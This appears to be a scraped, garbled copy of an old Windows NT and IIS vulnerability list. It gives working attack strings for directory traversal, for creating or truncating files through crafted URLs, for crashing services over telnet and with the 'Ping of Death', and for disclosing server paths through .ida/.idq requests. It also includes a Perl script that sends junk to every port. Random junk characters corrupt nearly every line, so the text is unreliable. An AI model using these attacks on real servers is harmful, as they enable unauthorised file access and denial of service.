受影響系統(tǒng):4.0,iis 1.0
8 v6 A- W+ m$ z uA URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
' o+ o1 d3 O: ?- v) c
; X, C) k5 E7 o9 u4 X3 {2 H' cA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.% W/ p0 A' q- ~! ] {
# j: n3 y8 z% D( B3 MBy default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.8 r/ }9 {2 c+ z/ Z) j2 r3 f5 Q# _7 G, H
: _# a1 N5 n, N( Z
--------------------------------------------------------------------- o( ?& i1 |/ ?+ R3 D% {4 _# b! A
; J4 }# Z' I8 X# |4 ?; z/ J: C7 m
受影響系統(tǒng):4.0# Y5 i4 M- M2 d) w% H/ n% }
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
; d( f- o0 }" |; a
: B/ k$ I- w: yIf the file 'target.bat' exists, the file will be truncated.
& ?6 S! h4 e9 n1 f+ L
/ B) x3 \, ?6 j n# p8 k4 b6 H7 v$ j, Z4 Y; b
A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.9 o q" u9 v) y# P
2 w) N% O, o5 c/ ~9 @ j9 e----------------------------------------------------------------------
- R- S7 k6 d# T5 v( m
6 U' V; N _* `: N# Q& Z5 G: K. _. w% `受影響系統(tǒng):3.51,4.0: X" T9 G. j6 \+ m/ {
Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.
' ?9 E/ H: R. @& o- A- a7 ] n4 x9 Y7 @1 }4 `2 Y# p5 v8 W
The following steps;; `8 P! ?7 N2 w: q
$ [+ |) \2 d- J: y. x. |5 }Telnet to an NT 4.0 system on port 135
' _& i4 }. R3 [- @: wType about 10 characters followed by a <CR>
6 a7 G/ {' i n7 e2 a3 L! c" tExit Telnet
* H" t+ E$ t% _6 ?results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.1 ?6 q0 A! n# ~' `! o
3 n) J1 }* L; U: v1 aWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
! ~/ C, s( U7 D6 V, z. X* L! T1 M1 P& U/ X e- p
The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.
0 g. g; W8 S+ r5 a' Q
( J2 n1 q( W6 S. {If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.0 c& Q% M) g% i( A! x) T
p5 \. P2 c* k" |The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):
3 ?- z7 ?: G, _+ A" j' f
& J8 O; j7 X. `# }/*begin poke code*/, j# k# g- W8 x+ g# u
) z' q; N8 c& Y' `* g. Wuse Socket;6 ]: y: t% q L
use FileHandle;
, `2 M3 h0 Q. l8 irequire "chat2.pl";2 d5 A0 e- r; u) P
( g% x4 n4 ~- B: ^1 Q, T
$systemname = $ARGV[0] && shift;% n) _1 a0 o% Q/ R' Y- t
" b( t' g7 |! ]/ j; v `
$verbose = 1; # tell me what you're hitting7 ~, H$ L. r" r/ p1 `2 H
$knownports = 1; # don't hit known problem ports. `) L: _( y$ c% G
for ($port = $0; $port<65535; $port++)
: d$ x- y Y+ ~. n, q. l+ V{
1 f3 g, t t- d3 V# i
9 y4 O1 E, g' o7 h) H& a$ N
1 i" k- t+ H) ]. a! u8 wif ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {+ D5 u& ]1 r. h6 E1 d
next;
& N% \! _9 \$ M4 U O( @/ c" k}5 x; h; ?* H! E8 `# z( L: X
$fh = chat::open_port($systemname, $port);4 ]% ?& e9 R8 q6 A3 M" g9 P
chat::print ($fh,"This is about ten characters or more");
5 o' X+ V8 n, a0 I4 r/ z; r' ^if ($verbose) {% h7 w% H1 J u4 B& e& G- G! v" \1 _
print "Trying port: $port\n";
$ @% m2 G+ p# N3 y. N8 Y}
; a. K$ u# S* Q- y Q. m! o6 v3 bchat::close($fh);
* i1 H* e6 C! ~. u6 l. i6 ^/ F+ h$ y& q9 m( q! D
}
8 t1 j6 \# ~1 j# I+ `) R. l
- B3 o3 H7 e: g5 a$ e& O: ^. X0 ^9 \1 X3 k& M
/*end poke code*/1 `. m: C1 I* x& w
! n; `; f5 ^/ {* m# f: s. V% rSave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername1 P) o- g# V ^7 W4 B+ U
& J( I/ ^3 d" f
--------------------------------------------------------------------------------1 _( F9 l9 N5 r' M% K9 N- [: r8 Z
: E8 g+ t0 K/ E& J; v) O, J B受影響系統(tǒng):4.0
- x$ }3 j1 I+ Y3 o5 B* yUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.; W6 P5 ]! ]& a7 B
) s, H3 U, S/ Z! \: f: E( qThis attack causes Dr. Watson to display an alert window and to log an error: * e) p7 C' c& m/ \( O3 O0 D
6 s( W# s% `: H2 N+ m0 L"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
/ d" e( F3 U* `! D$ d! Z% \. Y; r) }0 _ p3 r+ M
--------------------------------------------------------------------------------' m2 F- Z9 V2 M( q+ } R
6 F1 r' r: Z4 S% A- M( I受影響系統(tǒng):3.51,4.0
5 c0 Y& F# B. k- `3 iLarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
0 e0 C; ?8 U; w7 M2 r6 M9 e, l6 n$ n4 B7 u6 b3 Q3 ?
STOP: 0X0000001E
6 C; `" ~1 p4 ^6 [. y' HKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS, r$ I1 b, H) j$ x* I2 s1 t1 t; i
) g0 i3 Y1 i5 t- Y: ?-OR-
& `) {3 ~' k& I+ c" T
( Y1 o4 L. s9 e% i# T; b( E* ^& USTOP: 0x0000000A
! f, }' W5 f. Y& DIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS8 g3 o! F) z9 s9 v5 J M9 W6 N
0 }( x, W: Q3 P$ H; E( S% [
NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets. T' `2 ]: R" E9 r' u
8 z2 |5 I) L, K U
--------------------------------------------------------------------------------
& E* W; [$ ]3 U$ R, I8 A! N' w. D; H# Y) r
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure). & o! b1 u9 v1 o5 ]& `6 E
4 n5 c' ]. p o6 J& w3 }--------------------------------------------------------
, _' [) Q& j r
* d9 X7 u) t, U0 t. F% qIIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server |